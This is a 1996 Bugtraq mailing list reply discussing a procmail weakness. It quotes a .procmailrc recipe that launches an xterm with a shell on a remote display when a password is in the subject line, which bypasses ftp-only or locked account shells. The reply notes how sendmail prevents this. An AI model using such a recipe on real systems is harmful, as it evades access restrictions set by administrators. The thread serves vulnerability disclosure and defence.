Bugtraq mailing list archives
Re: procmail
From: Kari.Hurtta () dionysos fmi fi (Kari E. Hurtta)
Date: Wed, 7 Aug 1996 08:47:26 +0300
Neil Soveran-Charley kirjoittaa:
hi there , I just heard from a friend that there is a bug in procmail which allows anyone to open an xterm window from any m/c .has anyone heard of this if so can u post the details and the xploit thanx dannyNB: This isn't a 'hack an account' hole. However if you have 'ftponly' accounts, i.e. people grab email via pop, but also have ftp access for maintaingin their web pages, with a 'shell' that prints a message and exits, then the following is possible to work around such security... I think there may well be such an exploit. I'd guess it is simply something like: (.procmailrc contents) :0 Hc * ^Subject:.*APassword /usr/bin/X11/xterm -display <some display> -e <a shell> (end .procmailrc) Then email yourself with something with the password in the subject line and an xterm gets popped up on the display, running the given shell, thus bypassing any 'locked account' or 'ftponly' shells... I'm sure procmail MUST have some security feature to disallow this sort of thing? But I could be wrong, and haven't checked the manual pages yet.
Sendmail disallows this short things by not allowing pipes in .forward if user have not valid shell (listed in /etc/shells). Yes, if you use procmail as local delivery agent, then you need same kind mechanism in procmail also (if it allows piping mail to programs).
Current thread:
- Re: Exploiting Zolaris 2.4 ?? :), (continued)
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
- Re: your mail Greg Woods (Aug 05)
- Re: your mail neill (Aug 05)
- PAM login programs? Josh Wilmes (Aug 05)
- procmail DANIEL .D .EZEKIEL (Aug 05)
- (Fwd) CERT Advisory CA-96.17 - Vulnerability in Solaris vold Hubert Feyrer (Aug 06)
- Re: procmail Adam Shostack (Aug 06)
- Re: procmail Jon Lewis (Aug 06)
- Re: procmail Neil Soveran-Charley (Aug 06)
- Re: procmail James Wang (Aug 06)
- Re: procmail Kari E. Hurtta (Aug 06)
- Re: procmail Ficus Kirkpatrick (Aug 07)
- Re: procmail Melody Lynn Yoon (Aug 07)
- Re: your mail Greg Woods (Aug 05)
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
- Re: PAM login programs? Marek Michalkiewicz (Aug 06)
- Re: PAM login programs? Arthur Donkers (Aug 06)